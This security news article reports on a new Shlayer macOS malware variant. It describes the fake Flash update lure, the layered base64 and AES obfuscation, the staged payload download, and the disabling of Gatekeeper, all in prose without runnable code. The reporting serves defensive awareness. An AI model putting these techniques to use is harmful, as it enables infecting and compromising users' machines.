Another piece of Mac malware has been discovered. More specifically, security researchers came across a new variant of the so-called Shlayer malware, which has been targeting macOS users. Shlayer is a multi-stage malware, and in its latest version it has acquired privilege escalation capabilities.
The malware can also disable Gatekeeper to run unsigned second stage payloads. The Shlayer malware was first discovered in February 2018 by Intego researchers. The latest variant however was found by Carbon Black’s Threat Analysis Unit.
Shlayer macOS Malware New Variant: Technical Details
The malware is currently being distributed in the form of downloads from various websites, disguised as an Adobe Flash update.
Many of the sites redirecting to the fake updates have been masquerading as legitimate sites, or hijacked domains formerly hosting legitimate sites, and some appear to be redirected from malvertisements on legitimate sites, Carbon Black said.
The samples analyzed by the researchers are affecting macOS versions from 10.10.5 to 10.14.3, with macOS being the only target so far.
According to the report:
The malware employs multiple levels of obfuscation and is capable of privilege escalation. Many of the initial DMGs are signed with a legitimate Apple developer ID and use legitimate system applications via bash to conduct all installation activity. Although most samples were DMG files, we also discovered .pkg, .iso, and .zip payloads.
The malicious script within the DMG file is encrypted with the help of base64 and will decrypt a second AES encrypted script. The latter is set to be executed automatically after being decrypted.
It is the she second script that performs the following malicious activities, as per the report:
– Collects system information such as the macOS version and IOPlatformUUID (a unique identifier for the system)
– Generates a “Session GUID” using uuidgen
– Creates a custom URL using the information generated in the previous two steps and downloads the second stage payload.
– Attempts to download the zip file payload using curl
– Creates a directory in /tmp to store the payload and unzips the password-protected payload (note: the zip password is hardcoded in the script per sample)
– Makes the binary within the unzipped .app executable using chmod +x
– Executes the payload using open with the passed arguments “s” “$session_guid” and “$volume_name”
– Performs a killall Terminal to kill the running script’s terminal window
Then the malware will download more payloads in the form of adware. The researchers say that Shlayer malware makes sure the payloads will run by disabling Gatekeeper.
Once this is done, the second stage payloads will appear to be whitelisted software as macOS won’t check whether they are signed with an Apple developer ID. And in case Gatekeeper is not successfully disabled, the payloads will be signed with valid such IDs.
Even though Shlayer is currently distributing adware, future variants may be distributing more dangerous pieces. And after all, adware should not be underestimated as it may harm macOS’s overall performance and may lead to further complications.